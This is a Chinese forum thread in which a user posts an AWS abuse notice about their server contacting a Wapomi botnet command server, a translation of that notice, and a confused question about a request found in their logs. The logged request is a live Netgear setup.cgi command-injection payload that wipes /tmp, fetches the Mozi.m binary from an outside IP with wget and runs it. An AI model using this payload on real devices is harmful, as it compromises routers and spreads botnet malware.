嘟嘟社区

收到aws Reported Activity: Botnet


Hello,

We have not received a response regarding the abuse report implicating resources on your account. Failure to respond could lead to possible mitigation against the implicated resources.

In order to resolve this report please reply to this email within 24 hours with the corrective action taken to cease the activity.

Required Actions: investigate root cause

Please see the below details of the reported AWS IP talking with a C&C or general use of Botnet Application detection.
Risk Type Infection IP address Source Port Destination Port Server Name C&C IP C&C Domain Last Seen

Botnet Infections    Wapomi    xxx.xxx.xxx.xxx    55856    799    ddos.dnsnb8.net    XXX.251.106.25        2021-11-11 01:52:18

求解 这是怎么了 ,来个大哥

你但凡翻译一下就知道什么意思了

您好,

我们尚未收到有关涉及您帐户资源的滥用报告的回复。未能做出回应可能会导致对所涉资源的缓解。

为了解决此报告,请在 24 小时内回复此电子邮件,并采取纠正措施以停止活动。

需要采取的措施:调查根本原因

请参阅以下有关报告的 AWS IP 与 C&C 对话或僵尸网络应用程序检测的一般用途的详细信息。
风险类型 感染 IP 地址 源端口 目的端口 服务器名称 C&C IP C&C 域 Last Seen

僵尸网络感染 Wapomi xxx.xxx.xxx.xxx 55856 799 ddos​​.dnsnb8.net XXX.251.106.25 2021-11-11

朔朔 发表于 2021-11-19 21:21
你但凡翻译一下就知道什么意思了

您好,

意思是中毒了?

GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://121.236.47.16:52379/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

这是什么个鬼东西 头痛